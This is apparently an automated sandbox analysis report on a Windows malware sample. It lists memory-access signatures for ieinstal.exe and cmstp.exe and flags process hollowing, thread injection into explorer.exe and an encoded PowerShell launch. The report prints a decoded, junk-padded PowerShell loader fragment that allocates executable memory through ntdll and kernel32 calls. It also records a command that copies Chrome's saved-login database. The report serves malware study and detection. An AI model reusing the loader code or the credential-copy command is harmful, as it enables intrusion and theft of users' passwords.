      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED20050 mov eax, dword ptr fs:[00000030h]18_2_1ED20050
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD1074 mov eax, dword ptr fs:[00000030h]18_2_1EDD1074
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDC2073 mov eax, dword ptr fs:[00000030h]18_2_1EDC2073
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD4015 mov eax, dword ptr fs:[00000030h]18_2_1EDD4015
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD4015 mov eax, dword ptr fs:[00000030h]18_2_1EDD4015
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED87016 mov eax, dword ptr fs:[00000030h]18_2_1ED87016
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED87016 mov eax, dword ptr fs:[00000030h]18_2_1ED87016
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED87016 mov eax, dword ptr fs:[00000030h]18_2_1ED87016
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED1B02A mov eax, dword ptr fs:[00000030h]18_2_1ED1B02A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED1B02A mov eax, dword ptr fs:[00000030h]18_2_1ED1B02A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED1B02A mov eax, dword ptr fs:[00000030h]18_2_1ED1B02A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED1B02A mov eax, dword ptr fs:[00000030h]18_2_1ED1B02A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED3002D mov eax, dword ptr fs:[00000030h]18_2_1ED3002D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED3002D mov eax, dword ptr fs:[00000030h]18_2_1ED3002D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED3002D mov eax, dword ptr fs:[00000030h]18_2_1ED3002D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED3002D mov eax, dword ptr fs:[00000030h]18_2_1ED3002D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED3002D mov eax, dword ptr fs:[00000030h]18_2_1ED3002D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED941E8 mov eax, dword ptr fs:[00000030h]18_2_1ED941E8
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED0B1E1 mov eax, dword ptr fs:[00000030h]18_2_1ED0B1E1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED0B1E1 mov eax, dword ptr fs:[00000030h]18_2_1ED0B1E1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED0B1E1 mov eax, dword ptr fs:[00000030h]18_2_1ED0B1E1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED32990 mov eax, dword ptr fs:[00000030h]18_2_1ED32990
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED2C182 mov eax, dword ptr fs:[00000030h]18_2_1ED2C182
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED3A185 mov eax, dword ptr fs:[00000030h]18_2_1ED3A185
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED851BE mov eax, dword ptr fs:[00000030h]18_2_1ED851BE
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED851BE mov eax, dword ptr fs:[00000030h]18_2_1ED851BE
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED851BE mov eax, dword ptr fs:[00000030h]18_2_1ED851BE
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED851BE mov eax, dword ptr fs:[00000030h]18_2_1ED851BE
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED361A0 mov eax, dword ptr fs:[00000030h]18_2_1ED361A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED361A0 mov eax, dword ptr fs:[00000030h]18_2_1ED361A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED869A6 mov eax, dword ptr fs:[00000030h]18_2_1ED869A6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED2B944 mov eax, dword ptr fs:[00000030h]18_2_1ED2B944
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED2B944 mov eax, dword ptr fs:[00000030h]18_2_1ED2B944
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED0B171 mov eax, dword ptr fs:[00000030h]18_2_1ED0B171
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED0B171 mov eax, dword ptr fs:[00000030h]18_2_1ED0B171
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED0C962 mov eax, dword ptr fs:[00000030h]18_2_1ED0C962
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED09100 mov eax, dword ptr fs:[00000030h]18_2_1ED09100
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED09100 mov eax, dword ptr fs:[00000030h]18_2_1ED09100
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED09100 mov eax, dword ptr fs:[00000030h]18_2_1ED09100
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED3513A mov eax, dword ptr fs:[00000030h]18_2_1ED3513A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED3513A mov eax, dword ptr fs:[00000030h]18_2_1ED3513A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED24120 mov eax, dword ptr fs:[00000030h]18_2_1ED24120
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED24120 mov eax, dword ptr fs:[00000030h]18_2_1ED24120
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED24120 mov eax, dword ptr fs:[00000030h]18_2_1ED24120
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED24120 mov eax, dword ptr fs:[00000030h]18_2_1ED24120
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED24120 mov ecx, dword ptr fs:[00000030h]18_2_1ED24120
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047DC600 mov eax, dword ptr fs:[00000030h]27_2_047DC600
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047DC600 mov eax, dword ptr fs:[00000030h]27_2_047DC600
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047DC600 mov eax, dword ptr fs:[00000030h]27_2_047DC600
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04808E00 mov eax, dword ptr fs:[00000030h]27_2_04808E00
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04891608 mov eax, dword ptr fs:[00000030h]27_2_04891608
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E76E2 mov eax, dword ptr fs:[00000030h]27_2_047E76E2
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480A61C mov eax, dword ptr fs:[00000030h]27_2_0480A61C
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480A61C mov eax, dword ptr fs:[00000030h]27_2_0480A61C
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0488FE3F mov eax, dword ptr fs:[00000030h]27_2_0488FE3F
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0489AE44 mov eax, dword ptr fs:[00000030h]27_2_0489AE44
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0489AE44 mov eax, dword ptr fs:[00000030h]27_2_0489AE44
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04857794 mov eax, dword ptr fs:[00000030h]27_2_04857794
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04857794 mov eax, dword ptr fs:[00000030h]27_2_04857794
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04857794 mov eax, dword ptr fs:[00000030h]27_2_04857794
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047EFF60 mov eax, dword ptr fs:[00000030h]27_2_047EFF60
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047EEF40 mov eax, dword ptr fs:[00000030h]27_2_047EEF40
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D4F2E mov eax, dword ptr fs:[00000030h]27_2_047D4F2E
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D4F2E mov eax, dword ptr fs:[00000030h]27_2_047D4F2E
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FF716 mov eax, dword ptr fs:[00000030h]27_2_047FF716
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048137F5 mov eax, dword ptr fs:[00000030h]27_2_048137F5
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A070D mov eax, dword ptr fs:[00000030h]27_2_048A070D
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A070D mov eax, dword ptr fs:[00000030h]27_2_048A070D
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480A70E mov eax, dword ptr fs:[00000030h]27_2_0480A70E
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480A70E mov eax, dword ptr fs:[00000030h]27_2_0480A70E
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0486FF10 mov eax, dword ptr fs:[00000030h]27_2_0486FF10
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0486FF10 mov eax, dword ptr fs:[00000030h]27_2_0486FF10
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480E730 mov eax, dword ptr fs:[00000030h]27_2_0480E730
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A8F6A mov eax, dword ptr fs:[00000030h]27_2_048A8F6A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047E8794 mov eax, dword ptr fs:[00000030h]27_2_047E8794
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04853884 mov eax, dword ptr fs:[00000030h]27_2_04853884
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04853884 mov eax, dword ptr fs:[00000030h]27_2_04853884
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048020A0 mov eax, dword ptr fs:[00000030h]27_2_048020A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048020A0 mov eax, dword ptr fs:[00000030h]27_2_048020A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048020A0 mov eax, dword ptr fs:[00000030h]27_2_048020A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048020A0 mov eax, dword ptr fs:[00000030h]27_2_048020A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048020A0 mov eax, dword ptr fs:[00000030h]27_2_048020A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048020A0 mov eax, dword ptr fs:[00000030h]27_2_048020A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048190AF mov eax, dword ptr fs:[00000030h]27_2_048190AF
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047F0050 mov eax, dword ptr fs:[00000030h]27_2_047F0050
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047F0050 mov eax, dword ptr fs:[00000030h]27_2_047F0050
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480F0BF mov ecx, dword ptr fs:[00000030h]27_2_0480F0BF
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480F0BF mov eax, dword ptr fs:[00000030h]27_2_0480F0BF
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480F0BF mov eax, dword ptr fs:[00000030h]27_2_0480F0BF
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA830 mov eax, dword ptr fs:[00000030h]27_2_047FA830
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA830 mov eax, dword ptr fs:[00000030h]27_2_047FA830
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA830 mov eax, dword ptr fs:[00000030h]27_2_047FA830
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA830 mov eax, dword ptr fs:[00000030h]27_2_047FA830
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047EB02A mov eax, dword ptr fs:[00000030h]27_2_047EB02A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047EB02A mov eax, dword ptr fs:[00000030h]27_2_047EB02A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047EB02A mov eax, dword ptr fs:[00000030h]27_2_047EB02A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047EB02A mov eax, dword ptr fs:[00000030h]27_2_047EB02A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0486B8D0 mov eax, dword ptr fs:[00000030h]27_2_0486B8D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0486B8D0 mov ecx, dword ptr fs:[00000030h]27_2_0486B8D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0486B8D0 mov eax, dword ptr fs:[00000030h]27_2_0486B8D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0486B8D0 mov eax, dword ptr fs:[00000030h]27_2_0486B8D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0486B8D0 mov eax, dword ptr fs:[00000030h]27_2_0486B8D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0486B8D0 mov eax, dword ptr fs:[00000030h]27_2_0486B8D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D58EC mov eax, dword ptr fs:[00000030h]27_2_047D58EC
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04857016 mov eax, dword ptr fs:[00000030h]27_2_04857016
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04857016 mov eax, dword ptr fs:[00000030h]27_2_04857016
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04857016 mov eax, dword ptr fs:[00000030h]27_2_04857016
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D40E1 mov eax, dword ptr fs:[00000030h]27_2_047D40E1
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D40E1 mov eax, dword ptr fs:[00000030h]27_2_047D40E1
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D40E1 mov eax, dword ptr fs:[00000030h]27_2_047D40E1
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A4015 mov eax, dword ptr fs:[00000030h]27_2_048A4015
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A4015 mov eax, dword ptr fs:[00000030h]27_2_048A4015
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480002D mov eax, dword ptr fs:[00000030h]27_2_0480002D
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480002D mov eax, dword ptr fs:[00000030h]27_2_0480002D
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480002D mov eax, dword ptr fs:[00000030h]27_2_0480002D
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480002D mov eax, dword ptr fs:[00000030h]27_2_0480002D
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480002D mov eax, dword ptr fs:[00000030h]27_2_0480002D
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04892073 mov eax, dword ptr fs:[00000030h]27_2_04892073
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D9080 mov eax, dword ptr fs:[00000030h]27_2_047D9080
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048A1074 mov eax, dword ptr fs:[00000030h]27_2_048A1074
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480A185 mov eax, dword ptr fs:[00000030h]27_2_0480A185
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047DB171 mov eax, dword ptr fs:[00000030h]27_2_047DB171
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047DB171 mov eax, dword ptr fs:[00000030h]27_2_047DB171
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04802990 mov eax, dword ptr fs:[00000030h]27_2_04802990
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047DC962 mov eax, dword ptr fs:[00000030h]27_2_047DC962
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048061A0 mov eax, dword ptr fs:[00000030h]27_2_048061A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048061A0 mov eax, dword ptr fs:[00000030h]27_2_048061A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048569A6 mov eax, dword ptr fs:[00000030h]27_2_048569A6
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048949A4 mov eax, dword ptr fs:[00000030h]27_2_048949A4
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048949A4 mov eax, dword ptr fs:[00000030h]27_2_048949A4
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048949A4 mov eax, dword ptr fs:[00000030h]27_2_048949A4
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048949A4 mov eax, dword ptr fs:[00000030h]27_2_048949A4
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FB944 mov eax, dword ptr fs:[00000030h]27_2_047FB944
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FB944 mov eax, dword ptr fs:[00000030h]27_2_047FB944
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048551BE mov eax, dword ptr fs:[00000030h]27_2_048551BE
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048551BE mov eax, dword ptr fs:[00000030h]27_2_048551BE
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048551BE mov eax, dword ptr fs:[00000030h]27_2_048551BE
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048551BE mov eax, dword ptr fs:[00000030h]27_2_048551BE
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047F4120 mov eax, dword ptr fs:[00000030h]27_2_047F4120
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047F4120 mov eax, dword ptr fs:[00000030h]27_2_047F4120
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047F4120 mov eax, dword ptr fs:[00000030h]27_2_047F4120
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047F4120 mov eax, dword ptr fs:[00000030h]27_2_047F4120
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047F4120 mov ecx, dword ptr fs:[00000030h]27_2_047F4120
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_048641E8 mov eax, dword ptr fs:[00000030h]27_2_048641E8
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D9100 mov eax, dword ptr fs:[00000030h]27_2_047D9100
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D9100 mov eax, dword ptr fs:[00000030h]27_2_047D9100
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D9100 mov eax, dword ptr fs:[00000030h]27_2_047D9100
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047DB1E1 mov eax, dword ptr fs:[00000030h]27_2_047DB1E1
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047DB1E1 mov eax, dword ptr fs:[00000030h]27_2_047DB1E1
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047DB1E1 mov eax, dword ptr fs:[00000030h]27_2_047DB1E1
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480513A mov eax, dword ptr fs:[00000030h]27_2_0480513A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480513A mov eax, dword ptr fs:[00000030h]27_2_0480513A
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FC182 mov eax, dword ptr fs:[00000030h]27_2_047FC182
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480D294 mov eax, dword ptr fs:[00000030h]27_2_0480D294
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480D294 mov eax, dword ptr fs:[00000030h]27_2_0480D294
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_0480FAB0 mov eax, dword ptr fs:[00000030h]27_2_0480FAB0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D9240 mov eax, dword ptr fs:[00000030h]27_2_047D9240
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D9240 mov eax, dword ptr fs:[00000030h]27_2_047D9240
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D9240 mov eax, dword ptr fs:[00000030h]27_2_047D9240
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047D9240 mov eax, dword ptr fs:[00000030h]27_2_047D9240
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_04802ACB mov eax, dword ptr fs:[00000030h]27_2_04802ACB
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h]27_2_047FA229
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h]27_2_047FA229
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h]27_2_047FA229
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h]27_2_047FA229
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h]27_2_047FA229
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h]27_2_047FA229
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h]27_2_047FA229
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h]27_2_047FA229
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort
      Source: C:\Windows\SysWOW64\cmstp.exe Process queried: DebugPort
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED496E0 NtFreeVirtualMemory,LdrInitializeThunk

      HIPS / PFW / Operating System Protection Evasion:

      Sample uses process hollowing technique
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: EB0000
      Maps a DLL or memory area into another process
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: unknown protection: read write
      Encrypted powershell cmdline option found
      Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #Rven PAPAP sawbellyun Ricardt5 OKSBONNETL SCIE chinantas Nons Osamine Battalia2 Hovedp4 professi nanakol ensilerekl Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class bidrags1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int bidrags6,ref Int32 Auxamylase,int Fejem,ref Int32 bidrags,int HOCKEYKAMP,int bidrags7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Semiglut7,uint ATTESTE,int Etiket9,int bidrags0,int bellev,int Buldrr,int FOLKE);[DllImport("kernel32.dll")]public static extern int ReadFile(int Fejem0,uint Fejem1,IntPtr Fejem2,ref Int32 Fejem3,int Fejem4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Fejem5,int Fejem6,int Fejem7,int Fejem8,int Fejem9);}"@#Berigning balust Fjert Splintri7 Melanists VICEUDENRI nettovrd MAGSVEJRCL Mirkosu Cockfighta coppere OPELSK BJRNEUN Hagedesm7 farr Test-Path "objekt" Test-Path "FOLKE" $bidrags3=0;$bidrags9=1048576;$bidrags8=[bidrags1]::NtAllocateVirtualMemory(-1,[ref]$bidrags3,0,[ref]$bidrags9,12288,64)#Socialdem7 SCALD Boggles sikh Oliske Sjuskemal6 investm Elit9 MULTIFACTO Frugal Brnepsy Express Frde CORRODER FRONT fittilyske Epipl Purvey mundsk Stude4 selska komp kbesumsan Autotomicf TRAI lancew Trans Biorytme Test-Path "Baneberrie2" $bidrags2="$env:temp" + "\FORSVARL.dat"#BRATSCHER Prst Formulere3 Nasopharyn Montg CONTRALT NONCAPIL Victorian3 BRNDEVI
      Queues an APC in another process (thread injection)
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread APC queued: target process: C:\Windows\explorer.exe
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread register set: target process: 3440
      Source: C:\Windows\SysWOW64\cmstp.exe Thread register set: target process: 3440
      Source: C:\Windows\SysWOW64\cmstp.exe Thread register set: target process: 6392
      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP"
      Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
      Source: cmstp.exe, 0000001B.00000002.889678857.0000000003060000.00000002.00020000.sdmp Binary or memory string: Program Manager
      Source: explorer.exe, 00000022.00000000.755846261.0000000004532000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.676433392.0000000004534000.00000004.00000001.sdmp Binary or memory string: Progman
      Source: explorer.exe, 00000016.00000000.527886714.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.585187723.00000000083E7000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.551257243.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.525709271.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.578176779.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.575081727.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.566378249.00000000083E7000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.554958634.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.534558987.00000000083E7000.00000004.00000001.sdmp, cmstp.exe, 0000001B.00000002.889678857.0000000003060000.00000002.00020000.sdmp, explorer.exe, 00000022.00000000.753715921.0000000000B10000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
